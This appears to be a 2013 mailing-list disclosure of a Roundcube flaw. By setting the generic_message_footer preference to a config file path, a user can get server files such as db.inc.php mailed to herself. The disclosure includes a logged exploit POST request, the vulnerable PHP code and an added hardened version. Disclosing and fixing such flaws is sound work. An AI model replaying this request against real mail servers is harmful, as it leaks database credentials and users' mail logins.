[RCD] zero day vulnerability (tested on v8.0 to 9.0)

Sergey Sidlyarenko roundcube at lefoyer.ru
Wed Mar 27 17:04:38 CET 2013


The hacker first changes the value of the user preference generic_message_footer to
any file readable by roundcube (config/db.inc.php,
config/main.inc.php), then sends herself a message (with the config
file included). This allows viewing the session crypto key and the db user and password. If
phpmyadmin (mysql) or pgmyadmin (pgsql) is installed at the hosting and sessions are
saved in the db, the hacker gets the user's mail login and password.


Found in a Russian tech blog (http://habrahabr.ru/post/174423/).

------

POST /?_task=settings&_action=save-pref&check_request=&_check_request= HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" "_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php


------

index.php:

else if ($RCMAIL->action == 'save-pref') {
  include INSTALL_PATH . 'program/steps/utils/save_pref.inc';
}


------

program/steps/utils/save_pref.inc:

$name = get_input_value('_name', RCUBE_INPUT_POST);
$value = get_input_value('_value', RCUBE_INPUT_POST);

// save preference value
$RCMAIL->user->save_prefs(array($name => $value));   //<--------- rewrite value

// update also session if requested
if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) {
     // Support multidimensional arrays...
     $vars = explode('/', $sessname);

     // ... up to 3 levels
     if (count($vars) == 1)
         $_SESSION[$vars[0]] = $value;
     else if (count($vars) == 2)
         $_SESSION[$vars[0]][$vars[1]] = $value;
     else if (count($vars) == 3)
         $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;
}

$OUTPUT->reset();
$OUTPUT->send();

------

program/steps/mail/sendmail.inc

   // generic footer for all messages
   if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) {
       $footer = file_get_contents(realpath($CONFIG['generic_message_footer_html']));   //<----- load file from value path
       $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
   }
   else if (!empty($CONFIG['generic_message_footer'])) {
       $footer = file_get_contents(realpath($CONFIG['generic_message_footer']));   //<----- load file from value path
       $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
       if ($isHtml)
           $footer = '<pre>'.$footer.'</pre>';
   }
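For comparison, here is a hardened shape of the two code paths above, added as an illustrative example and not Roundcube's own code or its actual fix: the save-pref handler accepts only preference names from an allowlist (so a config-backed key such as generic_message_footer cannot be set from a request), and the footer loader confines the configured path to one directory. The function names, the allowlist contents and the footer directory are assumptions.

```php
<?php
// Added example, not Roundcube code. Names and lists below are hypothetical.

// Preferences a user may change through the save-pref action. Anything not
// listed here (in particular generic_message_footer and its _html variant,
// which are server-side config keys) is rejected instead of being stored.
const ALLOWED_USER_PREFS = [
    'preview_pane', 'autoexpand_threads', 'message_sort_col', 'message_sort_order',
];

// Validate the POSTed name/value pair; return the single-entry prefs array
// on success, throw on any name outside the allowlist.
function validate_pref_request(array $post): array
{
    $name  = isset($post['_name'])  ? (string) $post['_name']  : '';
    $value = isset($post['_value']) ? (string) $post['_value'] : '';
    if (!in_array($name, ALLOWED_USER_PREFS, true)) {
        throw new InvalidArgumentException("preference '$name' is not user-settable");
    }
    return [$name => $value];
}

// Load the generic footer only from inside $footerDir. realpath() canonicalises
// the joined path, so absolute paths and ../ sequences either resolve outside
// the base (rejected) or do not exist (rejected).
function load_generic_footer(string $footerDir, string $configured): string
{
    if ($configured === '') {
        return '';
    }
    $base = realpath($footerDir);
    $path = realpath($footerDir . DIRECTORY_SEPARATOR . $configured);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        error_log("refusing footer path outside $footerDir: $configured");
        return '';
    }
    $footer = file_get_contents($path);
    return $footer === false ? '' : $footer;
}

// Usage sketch: the request from the log line above is now rejected.
try {
    validate_pref_request(['_name' => 'generic_message_footer', '_value' => 'config/db.inc.php']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo strlen(load_generic_footer('/var/lib/roundcube/footers', '../../../etc/passwd')), "\n";
```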


-- 
Sidlyarenko Sergey
https://github.com/lefoyer
